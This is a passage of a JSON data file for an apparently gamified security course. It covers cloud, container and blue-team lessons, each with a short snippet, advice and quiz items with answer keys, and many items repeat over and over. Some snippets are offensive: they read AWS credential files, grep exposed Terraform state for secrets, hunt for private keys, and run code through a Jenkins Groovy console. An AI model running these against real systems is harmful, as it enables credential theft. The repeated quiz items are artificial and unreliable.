unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"terraform","cat":"Cloud & Container","title":"Terraform State Exploit","diff":2,"xp":150,"intro":"Extract secrets from state.","sections":[{"type":"text","content":"Extract secrets from state."},{"type":"code","lang":"bash","content":"curl https://bucket.s3.amazonaws.com/terraform.tfstate\ngrep -i 'password|secret' terraform.tfstate"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Terraform state contains?","opts":["Source code","All configs and secrets in plaintext","Diagrams","Logs"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"helm-exploit","cat":"Cloud & Container","title":"Helm Security","diff":2,"xp":150,"intro":"Helm misconfigurations.","sections":[{"type":"text","content":"Helm misconfigurations."},{"type":"code","lang":"bash","content":"helm get values release-name  # may contain secrets"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Helm v2 RCE component?","opts":["Chart","Tiller","Repository","Release"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"pod-sec","cat":"Cloud & Container","title":"Pod Security","diff":2,"xp":150,"intro":"Insecure pod configs.","sections":[{"type":"text","content":"Insecure pod configs."},{"type":"code","lang":"bash","content":"kubectl get pod target -o yaml | grep -A5 securityContext"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Full host access setting?","opts":["hostNetwork","privileged: true","readOnly","runAsNonRoot"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-keys","cat":"Cloud & Container","title":"Cloud Credential Discovery","diff":1,"xp":100,"intro":"Find cloud credentials.","sections":[{"type":"text","content":"Find cloud credentials."},{"type":"code","lang":"bash","content":"cat ~/.aws/credentials\nenv | grep AWS\nfind / -name '*.json' | xargs grep 'private_key'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS credentials location?","opts":["/etc/aws","~/.aws/credentials","/var/aws","/root/aws"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cicd-atk","cat":"Cloud & Container","title":"CI/CD Pipeline Attacks","diff":2,"xp":175,"intro":"Exploit CI/CD for secrets.","sections":[{"type":"text","content":"Exploit CI/CD for secrets."},{"type":"code","lang":"bash","content":"# Jenkins /script \u2192 Groovy console\nprintln 'id'.execute().text"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Groovy console CI tool?","opts":["GitHub Actions","Jenkins","GitLab CI","CircleCI"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-logs","cat":"Cloud & Container","title":"Cloud Log Analysis","diff":2,"xp":125,"intro":"Analyze audit logs.","sections":[{"type":"text","content":"Analyze audit logs."},{"type":"code","lang":"bash","content":"aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS API logging service?","opts":["CloudWatch","CloudTrail","Config","GuardDuty"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"fw-basics","cat":"Defense & Blue Team","title":"Firewall Configuration","diff":1,"xp":100,"intro":"iptables and Windows Firewall.","sections":[{"type":"text","content":"iptables and Windows Firewall."},{"type":"code","lang":"bash","content":"iptables -A INPUT -p tcp --dport 22 -j ACCEPT\niptables -A INPUT -j DROP"},{"type":"text","content":"Defense is harder than offense because you have to be right every time \u2014 the attacker only needs to be right once. But good defense isn't about blocking everything; it's about detecting quickly and responding effectively. The goal is to reduce dwell time (how long an attacker is in your network) and limit blast radius (how much damage they can do)."},{"type":"tip","content":"Focus your detection efforts on the techniques attackers actually use, not theoretical threats. The MITRE ATT&CK matrix is your guide: map your current detections against it, find the gaps, and build rules for the most common techniques first. High-quality alerts for 20 key techniques beat noisy alerts for 200."},{"type":"task","content":"Set up a SIEM (ELK Stack or Wazuh, both free). Forward logs from at least two sources (a Linux server and a Windows machine). Write detection rules for: failed logins (brute force), new user creation, and suspicious process execution (encoded PowerShell). Test each rule by simulating the attack."},{"type":"quiz","q":"iptables -j DROP does?","opts":["Allows all","Drops non-matching incoming","Logs","Redirects"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"siem","cat":"Defense & Blue Team","title":"SIEM Fundamentals","diff":1,"xp":100,"intro":"Security event management.","sections":[{"type":"text","content":"Security event management."},{"type":"code","lang":"bash","content":"index=security sourcetype=linux_secure failed\n| stats count by src_ip | sort -count"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SIEM stands for?","opts":["Security Information & Event Management","System Integration","Security Intelligence","System Information"],"ans":0},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"soc-ops","cat":"Defense & Blue Team","title":"SOC Operations","diff":1,"xp":100,"intro":"Security Operations 